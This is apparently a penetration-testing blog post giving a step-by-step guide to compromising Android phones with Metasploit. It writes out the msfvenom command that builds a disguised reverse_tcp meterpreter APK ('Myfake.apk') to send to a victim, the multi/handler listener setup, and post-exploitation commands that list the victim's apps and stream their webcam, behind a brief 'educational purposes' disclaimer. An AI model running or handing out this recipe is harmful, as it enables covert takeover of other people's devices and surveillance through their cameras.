Welcome you all for the series of blogs on penetration testing. Today we will look for How To hack any android Device. There are some techniques that we can really hack any Android device. So Today we will Learn How the Metasploit framework helps us to hack any Android device. This Content is Exclusively for educational purposes Don’t use this technique for illegal activities.

Setup Required:

System with Windows/ Linux/ Mac OS

Metasploit framework

Android Device

We do this in our local environment for now, we can also do it globally by port forwarding technique

How we can hack any Android mobile device using MSFvenom and Metasploit framework. Here, we will use MSFvenom for generating payload apk file and setup listener to Metasploit framework which manipulate Us and we can access victim device

For those who don’t know what is metasploit Metasploit is a penetration testing framework that makes hacking simple. It’s an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit, what payload to drop, and hit Enter.

Now, We will first creating a malicious apk file using MSFvenon which help us to access and get control any one device, Lets Do,

For making malicious apk file we will use command:

→ msfvenom -p android/meterpreter/reverse_tcp LHOST=Yourserverip LPORT=setport4444 R> Myfake.apk

As above Picture Now we have successfully created our payload for shell execute

Here -p Refer as payload always make sure to set Your local Host Server IP. Now, open the Metasploit framework by typing the command

→ msfconsole

Now we have successfully launched the Metasploit framework You can also open it by manually it default with Kali Linux

Now, Here we will use Metasploit MSF console that exploits and contains various modules for Android devices, Now we will setup Listener will use multi/handler for exploit by typing the command:

→ use exploit/multi/handler

Now, we need to set meterpreter/reverse_tcp which generates deep Listener here we will use the command:

→ set payload android/meterpreter/reverse_tcp

then we need to set LHOST to find lost type if config on your terminal,

Here we will set host by typing the command:

→ set LHOST

Then set LPORT By typing command:

→ set LPORT 4444

Now till here we have setup our malicious apk now it ready to send your victim and you can manipulate user device into your msfconsole session

Now, Turn For Another Step Now Install the Application that we have created Using msfvenonm

Victim Device

Now As above Picture we have installed malicious application that we have created Now,

Now, navigate to your msf console And to gaining access Victim Device by typing command:

→ exploit

As above picture we have successfully able to gaining access Our target Android Device Now, we have Successfully Stared meterpreter session.

Now, Use help command to see the functionality


Now, Check for all the application available On Our target android device here it will show all application packages , application name which inside on Our target android device

here we will use command:

→ app_list

Now, We can access Victim camera By Typing command :

→ webcam_list

As above picture We can access victim Camera By msfconsole to access victim webcam stream we will use command:

→ webcam_stream

As above picture Victim Webcam Live stream will Open Up on Our browser If victim running Webcam stream .

So we have successfully access control Our target Device using metasploit framework.

Download Metasploit: Download

Stick with our Blog series to learn more.

For more interesting topics please visit:


Pallab Jyoti Borah

VAPT Security Analyst

Table of Contents

Social Media